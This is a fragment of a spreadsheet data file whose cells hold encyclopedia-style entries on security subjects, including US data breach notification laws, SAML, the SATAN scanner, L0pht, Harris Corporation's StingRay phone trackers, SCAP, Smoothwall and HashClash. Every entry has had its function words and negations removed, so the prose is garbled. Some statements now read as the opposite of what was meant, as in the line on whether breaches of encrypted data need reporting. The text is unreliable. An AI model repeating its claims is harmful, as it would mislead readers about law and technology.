personally identifying information acquired reasonably believed acquired unauthorized person, reasonably likely cause substantial harm individuals information relates." this leaves room interpretation (will cause substantial harm?); breaches encrypted data need reported. must reported data obtained viewed unauthorized individuals long reason believe data harmful ways. national conference state legislatures maintains list enacted proposed security breach notification laws.some state differences data breach notification laws include thresholds harm suffered data breaches, need notify certain enforcement consumer credit agencies, broader definitions personal information, differences penalties non-compliance. federal data breach notification history august 2021, federal data breach notification law. first proposed federal data breach notification introduced congress 2003, never exited judiciary committee. similarly, number bills would establish national standard data security breach notification introduced u.s. congress, none passed 109th congress. fact, 2007, three federal data breach notification laws proposed, none passed congress. 2015 state union speech, president obama proposed legislation create national data breach standard would establish 30-day notification requirement discovery breach. this president obama's 2015 personal data notification protection (pdnpa) proposal. this would created federal notification guidelines standards, never came committee.chlotia garrison clovia hamilton theorized potential reason inability pass federal data breach notifications states' rights. now, states varying data breach notification laws. some restrictive, others broad. while comprehensive federal data breach notifications, federal laws require notifications data breaches certain circumstances. some notable examples include: federal trade commission (ftc act), financial services modernization (gramm-leach-bliley act), health insurance portability accountability (hipaa). debate federal state data breach notification laws most scholars, like angela daly, advocate federal data breach notification laws emphasize problem varying forms data breach notification laws. that companies forced comply multiple state data breach notification laws. this creates increased difficulty comply laws costs. addition, scholars argued state-by-state approach created problem uncompensated victims inadequate incentives persuade companies governments invest data security.advocates state-by-state approach data breach notification laws emphasize increased efficiency, increased incentives local governments increase data security, limited federal funding available multiple projects, lastly states able quickly adapt pass laws constantly evolving data breach technologies. 2018, majority state attorneys general opposed proposed federal data breach notification would preempt state laws. impact data breaches occur technical issues like code economic issues causing competing firm cooperate tackle data security. response, data breach notification laws attempt prevent harm companies public. criminal impact serious harm data breaches identity theft. identity theft harm individuals personal data stolen used another party create financial harm withdrawing money, financially fraudulently claiming health benefits, pretending committing crimes. based data collected 2002 2009 u.s. federal trade commission, data breach notification helped decrease identity theft percent. economic impact overall, data breach notifications leads decreasing market value, evident publicly traded companies experiencing decrease market valuation. other costs include loss consumer confidence trust company, loss business, decreased productivity, exposure third-party liability. notably, type data leaked breach varying economic impact. data breach leaks sensitive data experiences harsher economic repercussions. victim response most federal data breach lawsuits share certain characteristics. these include plaintiff seeking relief loss identity theft, emotional distress, future losses, increased risk future harm; majority litigation private class actions; defendants usually large firms businesses; common statutory causes action; lastly cases settle dismissed. references external links national conference state legislatures table security breach notification laws interactive comparing u.s. security breach notice laws (requires subscription) regarding security network data</t>
  </si>
  <si>
    <t>Kimchi (software)</t>
  </si>
  <si>
    <t>kimchi management tool manage kernel-based virtual machine (kvm) infrastructure. developed html5, kimchi developed intuitively manage guests, create storage pools, manage network interfaces (bridges, vlans, nat), perform related tasks. name extended acronym infrastructure management. apache-licensed project hosted github, incubated ovirt.org. references kimchi page github kimchi forum presentation adam litke kimchi announcement developers works kimchi submitted ovirt incubated project</t>
  </si>
  <si>
    <t>L-3 Communication Combat Propulsion Systems</t>
  </si>
  <si>
    <t>combat propulsion systems, division l-3, formerly division general dynamics land systems acquired 2005. located muskegon, michigan. combat propulsion systems employs people largest employer muskegon county 2006.the company's primary business building engines transmissions. builds supplies avds-1790 cylinder turbocharged diesel engine mt883 1500 diesel engine hmpt-500 hydromechanical transmission bradley fighting vehiclethe current facility home continental motors near turn century, teledyne, ryan aeronautical company, general dynamics land systems. notes references muskegon growth external links muskegon first article military today business week 1-3.com</t>
  </si>
  <si>
    <t>L-1 Identity Solutions</t>
  </si>
  <si>
    <t>identity solutions, inc. large american defense contractor connecticut. formed august 2006, merger viisage technology, inc. identix incorporated. specializes selling face recognition systems, electronic passports clear, biometric technology governments united states saudi arabia. also licenses technology companies internationally, including china. july 2011, safran (nyse euronext paris: saf) acquired identity solutions, inc. total cash amount 1.09 billion. part morpho's morphotrust department. bioscrypt biometrics research, development manufacturing company purchased identity solutions. provides fingerprint readers physical access control systems, facial recognition system readers contactless access control authentication fingerprint modules embedded applications. according research, bioscrypt world market leader biometric access control enterprises (since 2006) worldwide market share 13%. 2011, bioscrypt sold safran morpho. references external links identity solutions homepage morpho's homepage</t>
  </si>
  <si>
    <t>SecureLog</t>
  </si>
  <si>
    <t>cryptology, securelog algorithm used convert digital data trusted data verified authenticity questioned. securelog used solutions generates data support compliance regulations like sox. history algorithm used make datalogs secure manipulation. first infrastructure supporting algorithm available internet 2006. operation securelog involves active provider, managed data store verification provider. active provider active provider distributes active keys subscribers. active contains encrypted data representing time private secret. active validity period active provider. managed data store managed data store subscriber active keys delivered active provider. managed data store uses active keys asymmetric encryption, timestamping archive data locked database. verification provider verification provider read segments locked database verify content, timestamps integrity data broken manipulated since saved. uses algorithm used several different cases: compliance issues securelog used secure different types data logs like access logs, email archives transaction logs primarily compliance might issue. administrator weak link problem drawback archiving solutions always administrator access information. this makes difficult trust integrity data. securelog used solve traditional administrator problem. proposed uses government public sector several laws handles archiving data. proposed securelog used free institution lock government logs stop potential manipulation. several potential cases identified edri traffic logging problem method used public monitor data government collecting public. proposed used method solve privacy issues directive mandatory retention communications traffic data references directive 2006/24/ec european parliament weatech uspto patent 20060053294</t>
  </si>
  <si>
    <t>SecureWare</t>
  </si>
  <si>
    <t>secureware inc., founded 1986 developed software encryption technology securing unix-based operating systems. secure operating system used help secure world's first internet bank, security first network bank technologies). secureware also worked closely hp's federal division develop security products, trusted operating system, used u.s. department defense certain military information. 1996, secureware's internet system security division sold hewlett packard. rest secureware acquired security first network bank later year. references http://findarticles.com/p/articles/mi_m0ein/is_1995_dec_4/ai_17799106/ "secureware sells internet system security concentrates internet application security.." archived 2016-03-02 wayback machine free library. 1996 business wire feb. 2016</t>
  </si>
  <si>
    <t>Security Administrator Tool for Analyzing Networks</t>
  </si>
  <si>
    <t>security administrator tool analyzing networks (satan) free software vulnerability scanner analyzing networked computers. satan captured attention broad technical audience, appearing magazine drawing threats united states department justice. featured interface, complete forms enter targets, tables display results, context-sensitive tutorials appeared vulnerability found. naming offended name satan, software contained special command called repent, rearranged letters program's acronym "satan" "santa". description tool developed farmer wietse venema. neil gaiman drew artwork satan documentation. satan designed help systems administrators automate process testing systems known vulnerabilities exploited network. this particularly useful networked systems multiple hosts. like security tools, useful good malicious purposes also useful would-be intruders looking systems security holes. satan written mostly perl utilized browser netscape, mosaic lynx provide user interface. this easy interface drove scanning process presents results summary format. well reporting presence vulnerabilities, satan also gathered large amounts general network information, hosts connected subnets, types machines services offered. status satan fallen popularity height popularity 1990s. satan released 1995 development ceased. 2006, sectools.org conducted security popularity poll developed list network security analysis tools order popularity based responses 3,243 people. results suggest satan replaced nmap, nessus lesser degree sara (security auditor's research assistant), saint. references external links official home page history satan</t>
  </si>
  <si>
    <t>Security Assertion Markup Language</t>
  </si>
  <si>
    <t>security assertion markup language (saml, pronounced sam-el, open standard exchanging authentication authorization data parties, particular, identity provider service provider. saml xml-based markup language security assertions (statements service providers make access-control decisions). saml also: xml-based protocol messages protocol message bindings profiles (utilizing above)an important case saml addresses web-browser single sign-on (sso). single sign-on relatively easy accomplish within security domain (using cookies, example) extending across security domains difficult resulted proliferation non-interoperable proprietary technologies. saml browser profile specified standardized promote interoperability. overview saml specification defines three roles: principal (typically human user), identity provider (idp) service provider (sp). primary case addressed saml, principal requests service service provider. service provider requests obtains authentication assertion identity provider. basis assertion, service provider make access control decision, decide whether perform service connected principal. heart saml assertion subject principal within context particular security domain) something asserted. subject usually (but necessarily) human. saml technical overview, terms subject principal used interchangeably document. before delivering subject-based assertion request information principal—such user name password—in order authenticate principal. saml specifies content assertion passed saml, identity provider provide saml assertions many service providers. similarly, rely trust assertions many independent idps. saml specify method authentication identity provider. username password, form authentication, including multi-factor authentication. directory service radius, ldap active directory allows users user name password typical source authentication tokens identity provider. popular internet social networking services also provide identity services theory could used support saml exchanges. history organization advancement structured information standards (oasis) security services technical committee (sstc), first time january 2001, chartered define framework exchanging authentication authorization information." end, following intellectual property contributed sstc first months year: security services markup language (s2ml) netegrity authxml securant trust assertion service specification (x-tass) verisign information technology markup language (itml) jamcrackerbuilding initial contributions, november 2002 oasis announced security assertion markup language (saml) specification oasis standard.meanwhile, liberty alliance, large consortium companies, non-profit government organizations, proposed extension saml standard called liberty identity federation framework (id-ff). like saml predecessor, liberty id-ff proposed standardized, cross-domain, web-based, single sign-on framework. addition, liberty described circle trust participating domain trusted accurately document processes used identify user, type authentication system used, policies associated resulting authentication credentials. other members circle trust could examine policies determine whether trust information.while liberty developing id-ff, sstc began work minor upgrade saml standard. resulting saml specification ratified sstc september 2003. then, november year, liberty contributed id-ff oasis, thereby sowing seeds next major version saml. march 2005, saml announced oasis standard. saml represents convergence liberty id-ff proprietary extensions contributed shibboleth project, well early versions saml itself. most saml implementations support v2.0 many still support v1.1 backward compatibility. january 2008, deployments saml became common government, higher education, commercial enterprises worldwide. versions saml undergone minor major revision since 1.0. saml adopted oasis standard november 2002 saml ratified oasis standard september 2003 saml became oasis standard march 2005the liberty alliance contributed identity federation framework (id-ff) oasis sstc september 2003: id-ff released april 2003 id-ff finalized november 2003versions saml similar even though small differences exist., however, differences saml saml substantial. although standards address case, saml incompatible predecessor. although id-ff contributed oasis basis saml 2.0, important differences saml id-ff 1.2. particular, specifications, despite common roots, incompatible. design saml built upon number existing standards: extensible markup language (xml): most saml exchanges expressed standardized dialect xml, root name saml (security assertion markup language). schema (xsd): saml assertions protocols specified part) using schema. signature: both saml saml digital signatures (based signature standard) authentication message integrity. encryption: using encryption, saml provides elements encrypted name identifiers, encrypted attributes, encrypted assertions (saml encryption capabilities). encryption reported severe security concerns. hypertext transfer protocol (http): saml relies heavily http communications protocol. simple object access protocol (soap): saml specifies soap, specifically soap .saml defines xml-based assertions protocols, bindings, profiles. term saml core refers general syntax semantics saml assertions well protocol used request transmit assertions system entity another. saml protocol refers transmitted, (the latter determined choice binding). saml core defines "bare" saml assertions along saml request response elements. saml binding determines saml requests responses onto standard messaging communications protocols. important (synchronous) binding saml soap binding. saml profile concrete manifestation defined case using particular combination assertions, protocols bindings. assertions saml assertion contains packet security information: &lt;saml:assertion ...&gt; &lt;/saml:assertion&gt; loosely speaking, relying party interprets assertion follows: assertion issued time issuer regarding subject provided conditions valid. saml assertions usually transferred identity providers service providers. assertions contain statements service providers make access-control decisions. three types statements provided saml: authentication statements attribute statements authorization decision statementsauthentication statements assert service provider principal indeed authenticate identity provider particular time using particular method authentication. other information authenticated principal (called authentication context) disclosed authentication statement. attribute statement asserts principal associated certain attributes. attribute simply name–value pair. relying parties attributes make access-control decisions. authorization decision statement asserts principal permitted perform action resource given evidence expressiveness authorization decision statements saml intentionally limited. more-advanced cases encouraged xacml instead. protocols saml protocol describes certain saml elements (including assertions) packaged within saml request response elements, gives processing rules saml entities must follow producing consuming elements. part, saml protocol simple request-response protocol. important type saml protocol request called query. service provider makes query directly identity provider secure back channel. thus query messages typically bound soap. corresponding three types statements, three types saml queries: authentication query attribute query authorization decision querythe result attribute query saml response containing assertion, contains attribute statement. saml topic example attribute query/response. beyond queries, saml specifies protocols. saml expands notion protocol considerably. following protocols described detail saml core: assertion query request protocol authentication request protocol artifact resolution protocol name identifier management protocol single logout protocol name identifier mapping protocolmost protocols saml 2.0. bindings saml binding mapping saml protocol message onto standard messaging formats and/or communications protocols. example, saml soap binding specifies saml message encapsulated soap envelope, bound http message. saml specifies binding, saml soap binding. addition soap, implicit saml browser precursors http post binding, http redirect binding, http artifact binding. these defined explicitly, however, used conjunction saml browser sso. notion binding fully developed saml 2.0. saml completely separates binding concept underlying profile. fact, brand binding specification saml defines following standalone bindings: saml soap binding (based soap 1.1) reverse soap (paos) binding http redirect (get) binding http post binding http artifact binding saml bindingthis reorganization provides tremendous flexibility: taking browser alone example, service provider choose four bindings (http redirect, http post flavors http artifact), identity provider three binding options (http post plus forms http artifact), total twelve possible deployments saml browser profile. profiles saml profile describes detail saml assertions, protocols, bindings combine support defined case. important saml profile browser profile. saml specifies forms browser sso, browser/artifact profile browser/post profile. latter passes assertions value whereas browser/artifact passes assertions reference. consequence, browser/artifact requires back-channel saml exchange soap. saml 1.1, flows begin request identity provider simplicity. proprietary extensions basic idp-initiated flow proposed shibboleth, example). browser profile completely refactored saml 2.0. conceptually, saml browser/artifact browser/post special cases saml browser sso. latter considerably flexible saml counterpart "plug-and-play" binding design saml 2.0. unlike previous versions, saml browser flows begin request service provider. this provides greater flexibility, sp-initiated flows naturally give rise so-called identity provider discovery problem, focus much research today. addition browser sso, saml introduces numerous profiles: profiles browser profile enhanced client proxy (ecp) profile identity provider discovery profile single logout profile name identifier management profile artifact resolution profile assertion query/request profile name identifier mapping profile saml attribute profilesaside saml browser profile, important third-party profiles saml include: oasis services security (wss) technical committee liberty alliance oasis extensible access control markup language (xacml) technical committee security saml specifications recommend, cases mandate, variety security mechanisms: 1.0+ transport-level security signature encryption message-level securityrequirements often phrased terms (mutual) authentication, integrity, confidentiality, leaving choice security mechanism implementers deployers. primary saml case called browser single sign-on (sso). user utilizes user agent (usually browser) request resource protected saml service provider. service provider, wishing know identity requesting user, issues authentication request saml identity provider user agent. resulting protocol flow depicted following diagram. request target resource (saml only) principal (via http user agent) requests target resource service provider: https://sp.example.com/myresource service provider performs security check behalf target resource. valid security context service provider already exists, skip steps 2–7. redirect service (saml only) service provider determines user's preferred identity provider unspecified means) redirects user agent service identity provider: https://idp.example.org/saml2/sso/redirect?samlrequest=request value samlrequest parameter (denoted placeholder request above) base64 encoding deflated &lt;samlp:authnrequest&gt; element. request service (saml only) user agent issues request service step service processes authnrequest (sent samlrequest query parameter) performs security check. user valid security context, identity provider identifies user (details omitted). respond xhtml form service validates request responds document containing xhtml form: value samlresponse element (denoted placeholder response above) base64 encoding &lt;samlp:response&gt; element. request assertion consumer service user agent issues post request assertion consumer service service provider. value samlresponse parameter taken xhtml form step redirect target resource assertion consumer service processes response, creates security context service provider redirects user agent target resource. request target resource user agent requests target resource service provider (again): https://sp.example.com/myresource respond requested resource since security context exists, service provider returns resource user agent.in saml 1.1, flow begins request identity provider's inter-site transfer service step example flow above, depicted exchanges front-channel exchanges, http user agent (browser) communicates saml entity step. particular, back-channel exchanges direct communications service provider identity provider. front-channel exchanges lead simple protocol flows messages passed value using simple http binding (get post). indeed, flow outlined previous section sometimes called lightweight browser profile. alternatively, increased security privacy, messages passed reference. example, identity provider supply reference saml assertion (called artifact) instead transmitting assertion directly user agent. subsequently, service provider requests actual assertion back channel. such back-channel exchange specified soap message exchange (saml soap http). general, saml exchange secure back channel conducted soap message exchange. back channel, saml specifies soap 1.1. soap binding mechanism optional, however. given saml deployment choose whatever bindings appropriate. also saml metadata saml-based products services identity management identity management systems federated identity information card ws-federation oauth openid connect references external links oasis security services technical committee cover pages: security assertion markup language (saml) study learn saml demystifying saml first public saml identity provider daniel blum (2003). federated gains momentum. network world inc.</t>
  </si>
  <si>
    <t>Harris Corporation</t>
  </si>
  <si>
    <t>harris corporation american technology company, defense contractor, information technology services provider produced wireless equipment, tactical radios, electronic systems, night vision equipment terrestrial spaceborne antennas government, defense commercial sectors. they specialized surveillance solutions, microwave weaponry, electronic warfare. 2019, merged technologies form l3harris technologies. headquartered melbourne, florida, company approximately billion annual revenue. largest private-sector employer brevard county, florida (approximately 6,000). from 1988 1999, company parent intersil, name harris semiconductor. 2016, harris named hundred federal contractors defense news. january 2015, wired magazine ranked harris corporation—tied u.s. marshals service—as number threat privacy communications internet. history "harris automatic press company" founded alfred harris niles, ohio, 1895. company spent next years developing lithographic processes printing presses acquiring typesetting company intertype corporation. 1957, harris acquired gates radio, producer broadcast transmitters associated electronics gear, kept gates brand name alive putting gates sticker back numerous transmitters labeled harris front panels.the year, acquired intertype corporation, type foundry based york, york.in 1959, acquired microwave technology company electronics, also headquartered brooklyn, york.in 1967, merged radiation incorporated (formed 1950) melbourne, florida, developer antenna, integrated circuit modem technology used space race. company headquarters moved cleveland melbourne 1978.in 1969, harris corporation acquired communications farinon electric corporation, furthering microwave assets. printing operations sold 1983 became part manroland goss 2018.in 1974, harris acquired datacraft corporation, formation harris computer systems division. division made line minicomputers real-time systems market. 1994, division spun independent harris computer systems corporation.in 1979, harris formed semiconductor joint venture matra harris semiconductors (mhs), harris withdrew 1989. after changes taken atmel.in 1988, harris acquired ge's semiconductor business, time, also incorporated intersil semiconductor businesses. these combined harris' existing semiconductor businesses. 1996, harris corporation formed joint venture shenzhen telecom company produce sell harris' digital microwave radios integrate systems.in november 1998, harris sold commercial standard military logic (semiconductor) product lines texas instruments, included hc/hct, cd4000, ac/act product families. harris retained production radiation hardened versions products. 1999, harris spun remaining semiconductor business independent company, intersil name. 2005, corporation spent $870 million research development.harris corporation developed hand held computer address canvassing portion 2010 united states census. secured access fingerprint swipe guaranteed verified user access unit. capacity integral daily address management transfer information gathered. major importance security integrity personal private information populace. january 2011, harris re-opened calgary, alberta avionics operation, harris canada inc.. expanded facility's operations include among others support work completed company's six-year, $273 million (cad) services contract government canada cf-18 avionics optimized weapon system support (owss) program.in december 2012, harris corporation sold broadcast equipment operations gores group operated harris broadcast gatesair. harris received $225m transaction, exactly half paid seven years earlier leitch technology, final acquisition broadcast division.on 2015, purchase competitor exelis inc. finalized, almost doubling size original company.in july 2015, harris corporation sold healthcare division, harris healthcare solutions, nanthealth.in january 2017, harris sold government services division veritas capital $690 million. after acquired veritas, business renamed peraton.in october 2018 harris announced all-stock "merger equals" york-based technologies, closed (subject approvals) mid-2019. company, called harris technologies, inc., based melbourne, florida.in 2019, elbit systems america, american division israeli elbit systems, agreed purchase harris's night vision product line $350 million, contingent completion harris's merger federal regulations required harris divest night vision business already night vision business merger companies would effectively eliminate competition industry. that purchase closed september 2019, harris night vision subsequently renamed elbit systems america night vision. business segments communication systems harris communication systems segment served markets tactical airborne radios, night vision technology defense public safety networks. electronic systems harris electronic systems segment provided products services electronic warfare, traffic management, avionics, wireless technology, c4i, undersea systems aerostructures. electronic systems (es) division provided "alq-214" radio frequency jamming equipment u.s. navy's f/a-18 hornet aircraft. alq-214 originally developed exelis harris acquired 2015. also provider components avionics package targeting systems u.s. navy's f/a-18 ea-18 growlers. space intelligence systems harris space intelligence systems segment, formed harris purchased exelis, provides capabilities earth observation, weather, geospatial monitoring, space protection intelligence, including sensors payloads, ground processing information analytics. cell-site simulators harris corporation produced multiple cell-site simulator products, stingray hailstorm phone trackers (see table below); these masquerade legitimate cellphone towers duping mobile devices connect instead real cellular networks, wireless voice data traffic originating given area intercepted systems, enabling stingray operators conduct mass surveillance triangulate position mobile devices.originally developed u.s. navy later used global "war terror" outside increasingly used police agencies. more u.s. federal agencies platforms, including fbi, drug enforcement administration immigration customs enforcement. american civil liberties union (aclu) says least enforcement agencies states, similar devices.these platforms controversial surveil communications mobile devices vicinity, including individuals suspected crimes. harris criticized civil rights advocates requiring local municipalities, police state governments enter non-disclosure agreements (nda) conceal usage platforms citizens courts. such violate public record open access laws. aclu, electronic privacy information center (epic), electronic frontier foundation (eff) filed successful civil lawsuits denied freedom information (foia) requests violations public records laws florida.in september 2014, result successful litigation, aclu received documents emails harris corporation federal communications commission relating approval harris' surveillance systems. aclu sent letter stating, view, harris misled office engineering technology staff regulatory review process falsely claiming systems used emergency situations criminal investigations.in 2006, harris employees directly conducted wireless surveillance using stingray units behalf palm police department—where harris campus—in response bomb threat middle school. search conducted without warrant judicial oversight.in 2015, santa clara county withdrew contract negotiations harris stingray units, noting reason onerous restrictions imposed harris could released public records requests. list harris acquisitions notable people asher friesem, former engineer howard lance, former edythe perlick, former player all-american girls professional baseball league frank pritt, former salesperson joan sherman, first woman technical director david chessey, former site computer engineer also positiveid, government contracted florida-based biotech company specializes tracking tech u.s. military references external links official website business data harris corporation: u.s. state department cables harris corp. "cablegate" archive (released wikileaks) florida stingray foia, public records pertaining harris corp. stingray phone-tracker police states trick cell phone</t>
  </si>
  <si>
    <t>L0pht</t>
  </si>
  <si>
    <t>l0pht heavy industries (pronounced "loft") hacker collective active 1992 2000 located boston, massachusetts area. l0pht first viable hackerspaces pioneer responsible disclosure. group famously testified front congress 1998 topic ‘weak computer security government’. name second character name originally slashed zero, symbol used teletypewriters character mode operating systems mean zero. modern online name, including domain name, therefore "l0pht" (with zero, letter history origin l0pht traced brian oblivion count zero, founding members, sharing common loft space south boston wives (mary alicia)who business half space helped establish communal work space. there experimented personal computers, equipment purchased flea mit, items obtained dumpster diving local places interest.founded 1992 l0pht quickly became location members store computer hardware work various projects. time, members l0pht quit jobs start business venture named l0pht heavy industries, hacker think tank. business released numerous security advisories. they also produced widely used software tools l0phtcrack, password cracker windows pocsag decoder, software collections. 1997, august 8–10, mudge, brian oblivion, kingpin, space rogue, stefan, weld pond, john l0pht discussed recent projects accomplishments, windows projects, emerging trends shortcomings technologies, session beyond hope puck building york city.in october 1999 l0pht featured lengthy article york times sunday magazine. article jeffrey hunker, nsc's director information protection, said l0pht, "their objective basically help improve state security gadfly, speak." january 2000, l0pht heavy industries merged startup @stake, completing l0pht's slow transition underground organization "whitehat" computer security company. symantec announced acquisition @stake september 2004, completed transaction october year.in march 2006, weld pond dildog founded application security company veracode spin symantec. veracode static binary analysis technology built @stake, based prototypes ideas incubated l0pht. march 2008, several members l0pht panel standing-room-only group infosec professionals source:boston. present weld pond, john tan, mudge, space rogue, silicosis dildog. senate testimony 1998, seven members l0pht (brian oblivion, kingpin, mudge, space rogue, stefan neumann, john tan, weld pond) famously testified congress united states could shut entire internet minutes. washington post referred response tragedy missed opportunity".four members original group space rogue, weld pond, kingpin mudge held briefing entitled disaster foretold ignored” revisiting first-ever congressional cybersecurity hearing" hosted congressional internet caucus academy. briefing, held 2018, almost exactly years original testimony streamed live facebook.at defcon hacking conference, held august 2018 vegas, seven l0pht members panel entitled "the l0pht testimony, years later (and other things were afraid ask)". among things panel encouraged attendees keep hacking stay side kept jail.the general counsel national security agency, glenn gerstell quoted testimony l0pht’s hearing keynote american association’s 28th annual review field national security conference november 2018. products l0pht occupied physical space, real expenses electricity, phone, internet access, rent. early l0pht's history costs evenly divided among l0pht members. fact, l0pht originally shared space hat-making business spouses brian oblivion count zero, rental cost divided amongst both. this soon subsidized profits made selling hardware monthly electronic flea market summer.occasionally, shell accounts offered cost l0pht.com server selected individuals; individuals access l0pht.com server members l0pht. first physical products sold profit l0pht pocsag decoder kit, sold assembled form. subsequently, whacked archives transferred cd-rom sale, soon followed copies black crawling system archives. command line version l0phtcrack, password cracker windows given away free, version sold commercial product. this followed creation hacker news network website host advertisements. however, even sources income, l0pht barely broke even, eventually began custom security coding companies like nfr.in january 2009, l0phtcrack acquired original authors zatko, wysopal, rioux symantec. l0phtcrack released source boston conference march 2009. l0phtcrack contains support 64-bit windows platforms well upgraded rainbow tables support. april 2020 terahash announced acquired l0phtcrack, details sale released. july 2021, l0phtcrack software longer owned terahash, llc. repossessed previous owners, formerly known l0pht holdings, terahash defaulting installment sale loan. l0phtcrack released open source. members l0pht membership varied included various times: brian oblivion count zero dildog kingpin silicosis (paul nash) space rogue (cris thomas) stefan (stefan wuensch) weld pond mudge later became program manager darpa worked google (john tan) references external links current l0pht homepage hacker news network archived 2000-08-17 wayback machine l0phtcrack homepage archived 2012-03-04 wayback machine black crawling systems archive space rogue's blog kingpin empire legacy l0pht april 2014 "hacking around". newshour. 1998-05-08. archived original 1999-10-12. retrieved 2015-04-01. "u.s. senate press release: hearings announced computer security failures government". senate. archived original 2011-09-27. retrieved 2015-04-01. "the l0pht legacy" security boulevard '90s hacker collective turned infosec vip: internet security improved years register</t>
  </si>
  <si>
    <t>Hash Code (programming competition)</t>
  </si>
  <si>
    <t>hash code global team programming competition organized google. participants work teams people solving programming challenge inspired software engineering google. first edition local event google office paris participants attendance. since then, competition expanded globally reached 128,000 registered participants 2021 edition. competition consists qualification round, teams invited final event. references</t>
  </si>
  <si>
    <t>Security Content Automation Protocol</t>
  </si>
  <si>
    <t>security content automation protocol (scap) method using specific standards enable automated vulnerability management, measurement, policy compliance evaluation systems deployed organization, including e.g., fisma (federal information security management act, 2002) compliance. national vulnerability database (nvd) u.s. government content repository scap. example implementation scap openscap. purpose guard security threats, organizations need continuously monitor computer systems applications deployed, incorporate security upgrades software deploy updates configurations. security content automation protocol (scap), pronounced "ess-cap", commonly "skap" comprises number open standards widely used enumerate software flaws configuration issues related security. applications conduct security monitoring standards measuring systems find vulnerabilities, offer methods score findings order evaluate possible impact. scap suite specifications standardize nomenclature formats used automated vulnerability management, measurement, policy compliance products. vendor computer system configuration scanner product validated scap, demonstrating interoperate scanners express scan results standardized way. scap defines following standards (referred scap 'components') combined: scap components starting scap version (november, 2009) common vulnerabilities exposures (cve) common configuration enumeration (cce) (prior web-site mitre) common platform enumeration (cpe) common vulnerability scoring system (cvss) extensible configuration checklist description format (xccdf) open vulnerability assessment language (oval)starting scap version (february, 2011) open checklist interactive language (ocil) version 2.0starting scap version (september, 2011) asset identification (aid) asset reporting format (arf) common configuration scoring system (ccss) trust model security automation data (tmsad)starting scap version (february, 2018) software identification (swid) tags scap checklists security content automation protocol (scap) checklists standardize enable automation linkage computer security configurations nist special publication 800-53 800-53) controls framework. current version scap meant perform initial measurement continuous monitoring security settings corresponding 800-53 controls. future versions likely standardize enable automation implementing changing security settings corresponding 800-53 controls. way, scap contributes implementation, assessment, monitoring steps nist risk management framework. accordingly, scap forms integral part nist fisma implementation project. scap validation program scap validation program tests ability products employ scap standards. nist national voluntary laboratory accreditation program (nvlap) accredits independent laboratories program perform scap validations. vendor seeking validation product contact nvlap accredited scap validation laboratory assistance validation process. customer subject fisma requirements, wants security products tested validated scap standard independent third party laboratory, visit scap validated products page verify status product(s) considered. external links security content automation protocol site national vulnerability database site mitre "making security measurable" site scap search</t>
  </si>
  <si>
    <t>Smoothwall</t>
  </si>
  <si>
    <t>smoothwall (formerly styled smoothwall) linux distribution designed used open source firewall. smoothwall configured web-based requires little knowledge linux install use. smoothwall also private software company based specializes development content filtering, safeguarding internet security solutions, also maintains smoothwall open source project. history smoothwall began life smoothwall gpl, freely redistributable open source version. august 2000, proprietary version sold smoothwall november 2001. smoothwall still maintains open source roots smoothwall express still available today (latest release v3.1 2014), however main smoothwall solution paid millions users worldwide public private sector. smoothwall's filtering safeguarding products typically sold educational organisations businesses. 2017, smoothwall announced management buyout backed private equity fund, tenzing. management team georg ell, previously director western europe tesla, appointed group 2018. georg joined existing board members gavin logan, douglas hanley manprit randhawan management smoothwall business, along lisa stone, took position chairperson. august 2021, tenzing announced agreed sell investment smoothwall australian security firm family zone cyber safety £75.5 million (a$142m cash consideration. deal completed august 2021, £10.5m deferred balance sale price paid september 2021. smoothwall express smoothwall express, originally smoothwall gpl, freely distributable version smoothwall, developed smoothwall open source project team members smoothwall ltd.released august 2000, smoothwall developed lawrence manning richard morrell provide quick easy-to-use solution problem sharing isdn connections rest lan. created using linux, smoothwall originally simple functions: control modem dial hang route tcp/ip packets internet connection, back again. hidden public network nat, applied using ipchains. beginning august 2000, smoothwall 0.9.x series went several versions based linux kernel, culminating 0.9.9 december 2001, probably popular release. each release number improvements, including (port address translation), dmz, pstn isdn dial-up support, broadband (adsl cable) support. smoothwall released december 2002, including previously released patches security fixes, ended development 0.9.x/1.0 series, although supported errata updates another year half. smoothwall limited late 2001, manning morrell, george lungley, formed smoothwall limited registered private limited company, company number 04298247. company formed take open source software commercialise expanding software include corporate enterprise oriented functionality, provide dedicated support staff customers contact. based yarfort, office charlotte, company continued develop commercial, closed source smoothwall product range, moving initial direct sales model reseller, channel-based sales model. past products smoothwall server edition first product smoothwall ltd., released november 2001. essentially smoothwall 0.9.9 support included company. this virtually future products made available purchase cd-rom directly smoothwall ltd. mail order. initially announced january 2002, priced £30, never released, smoothwall home server aborted attempt home residential market. used open source platform base included smoothguard, would permitted customers make email support requests directly smoothwall ltd. released december 2001, smoothwall corporate server first long line separate, closed source releases smoothwall ltd. forked smoothwall 0.9.9se, corporate server included additional features scsi support, capability increase functionality add-on modules. these modules included smoothguard (content filtering proxy), smoothzone (multiple dmz) smoothtunnel (advanced features). corporate server designed become backbone future products company, module functionality permitting customers select exact level functionality required. further modules released time, providing particular functionality, traffic shaping, e-mail anti-virus anti-spam. after daniel barron, author dansguardian, joined company april 2002, variant corporate server called smoothwall corporate guardian released, integrating fork dansguardian called smoothguardian. corporate guardian stand-alone proxy, cache filtering solution. smoothguardian also made available stand-alone module corporate server customers, replacing smoothguard module. school guardian created variant corporate guardian, adding active directory/ldap authentication support firewall features package designed specifically schools. when released june 2005, version corporate server renamed corporate firewall. february 2008, corporate guardian renamed network guardian release 2008 version. released 2005, smoothwall advanced firewall targeted enterprise market directly bundling corporate server available add-on modules, adding functionality, including active directory, edirectory ldap authentication capability network interfaces external connection load balancing. april 2007, company released smoothguard utm-1000 hardware appliance, based commodity intel core 19-inch rack-mountable chassis. utm-1000 came pre-installed variant smoothwall advanced firewall. awards reader's vote, linux format, best security tool, 2001 supplier year highly commended, education resources awards, 2017 cyber security software technology excellence awards, worldwide business review, 2017 references external links smoothwall limited http://www.smoothwall.org smoothwall express distrowatch computer reseller news: advancing firewall protection (2006-01-09) network computing: rollout: smoothwall's corporate guardian (2006-09-28) information week: build this cheap effective firewall (2007-01-29)</t>
  </si>
  <si>
    <t>HashClash</t>
  </si>
  <si>
    <t>hashclash distributed computing project find collisions hash algorithm. based department mathematics computer science eindhoven university technology, marc stevens initiated project part master's degree thesis. project ended stevens defended m.sc. thesis june 2007. however sha1 added later, code repository ported 2017.the project used create rogue certificate authority certificate 2009. also boinc list distributed computing projects references external links hashclash hashclash stevens' home page create collisons aws, mchugh's blog</t>
  </si>
  <si>
    <t>SmartWater</t>
  </si>
  <si>
